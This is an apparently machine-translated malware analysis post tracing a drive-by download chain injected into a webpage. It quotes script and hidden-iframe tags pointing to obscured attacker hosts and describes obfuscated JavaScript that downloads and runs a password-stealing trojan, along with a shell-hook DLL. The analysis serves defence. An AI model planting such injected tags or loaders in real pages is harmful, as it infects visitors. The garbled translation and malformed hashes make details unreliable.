Spread the URL Trojan. psw. win32.onlinegames, Trojan. DL. win32.agent. xAA
EndurerOriginal
1Version
Yesterday, an ARP virus was detected in another computer. When a webpage was opened, the Kaspersky general report detected the trojan program.Trojan-Downloader.JS.Psyme.kf.
At noon, I was unable to analyze the problem because I helped netizens overhaul their computers (see Trojan. psw. win32.onlinegames/* door0.dll.
Now let's parse it.
View the webpage code and find that the header is added:
/---
<SCRIPT src = hxxp: // * 67.1*9.116.188/n **. JS> </script <script language = "JavaScript" src = "hxxp: // v *. 9 ** 1 T * g.net/kw..js "> </SCRIPT>
---/
Hxxp: // * 67.1*9.116.188/n **. js content is eval () to execute a custom function. The original code is obtained after three decryption, and the function is to output the Code:
/---
<SCRIPT src = "hxxp: // o * ran.3 ** 168 * a *. com/s368/newjs2.js"> </SCRIPT>
<IFRAME width = 0 Height = 0 src = "hxxp: // o * ran.3 ** 168 * a *. com/s368/t368.htm"> </iframe>
<IFRAME width = 0 Height = 0 src = "hxxp: // o * ran.3 ** 168 * a *. com/s368/t368.gif"> </iframe>
---/
Hxxp: // o * ran.3 ** 168 * a *. com/s368/newjs2.js:
/---
Strinfo = "/x3c/x73 /... (Omitted )... /X74/x3e"
Document. Write (strinfo );
---/
The original code is obtained after two decryption. The function is to download s368.exe and save it to % WINDIR %. The file name is generated by the custom function gnms (n) in the format ~ Temp *****. tmp, where * is a number, and then calls cmd.exe/C to start.
File Description: D:/test/s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 14:42:58
Modification time:
Access time:
Size: 22575 bytes, 22.47 KB
MD5: 3c5cda-b83b4377ac4a8c1e60f84af81
Kaspersky reportsTrojan-PSW.Win32.OnLineGames.aqq
| Subject: |
Virus report email analysis result-flow Ticket No.: 20070827145718842307 |
| Sender: |
"" <Send@rising.net.cn> |
Sent: |
Dear customer!
Your email has been received. Thank you for your support for rising.
We have analyzed your problems and files in detail. The following are the analysis results of the files you uploaded:
1. File Name: s368.exe
Virus Name:Trojan. psw. win32.onlinegames. XYZ
The virus file you reported will be processed in version 19.38.02.
Hxxp: // o * ran.3 ** 168 * a *. com/s368/t368.htm contains JavaScript code. After two decryption, the original code is obtained. The starting part is:
/---
<Script language = JavaScript> fn56 = 8139; function _ nR () {return true} onerror = _ nR; da15 = 9282; _ licensed_to _ = "huyufeng "; </SCRIPT> <SCRIPT src = "Important. JS "> </SCRIPT>
---/
Important. JS encapsulates code for controlling thunder_server tasks, such as starting (classifying) all tasks, pausing (classifying) all tasks, deleting (classifying) all tasks, and restoring (classifying) all tasks.
The following code creates and uses the thunder_server to download s368.scr to C :/.
S368.scr is the same as s368.exe.
Hxxp: // o * ran.3 ** 168 * a *. com/s368/t368.gif contains JavaScript code, which is decrypted to obtain the original code. The start part is:
/---
<Script language = JavaScript> gw91 = 3841; function _ nR () {return true} onerror = _ nR; fk51 = 4984; _ licensed_to _ = "huyufeng "; </SCRIPT>
---/
The following code judges windows and IE versions. If WINXP and IE6 are used, the code is output:
/---
<IFRAME Height = 0 width = 0 src =/"tsf-ok.gif/"> <// IFRAME>
---/
Hxxp: // o * ran.3 ** 168 * a *. com/s368/tsf-ok.gif contains JavaScript code, which is decrypted to obtain the original code. The start part is:
/---
<Script language = JavaScript> ha57 = 933; function _ nR () {return true} onerror = _ nR; gn17 = 2076; _ licensed_to _ = "huyufeng "; </SCRIPT> <object classid = "CLSID: EEDD6FF9-13DE-496B-9A1C-D78B3215E266" id = 'target'> </Object>
---/
The next step is the code that exploits the overflow vulnerability. Take a look at it later.
Hxxp: // v *. 9 ** 1 T * g.net/kw..js check whether cookies named cookie1 exist. If not, create them and output the Code:
/---
<Script language = "javascript1.2" src = "hxxp: // v *. 9 ** 1 T * g.net/t.js"> </SCRIPT>
---/
Hxxp: // v *. 9 ** 1 T * g.net/t.js function is used to output escape encrypted data, and the decrypted data is VBScript code. The function is to use the custom function leofunc () to decrypt the data and execute, after decryption, the data is VBScript code. Some of the data is still encrypted using the custom function leofunc (). The function is to download W. DLL, and save it to % WINDIR %. The file name is winhelp. DLL, modify the Registry for registration, CLSID is {6b3fsp_8-e5c7-477a-817e-72865a7758ae}, and write it to the shellexecutehooks key.
File Description: D:/test/W. dll
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 7680 bytes, 7.512 KB
MD5: 28e9c359886f7178931b3facw.e5dfa
Kaspersky reportsTrojan-Downloader.Win32.Agent.bgkThe rising report isTrojan. DL. win32.agent. xAA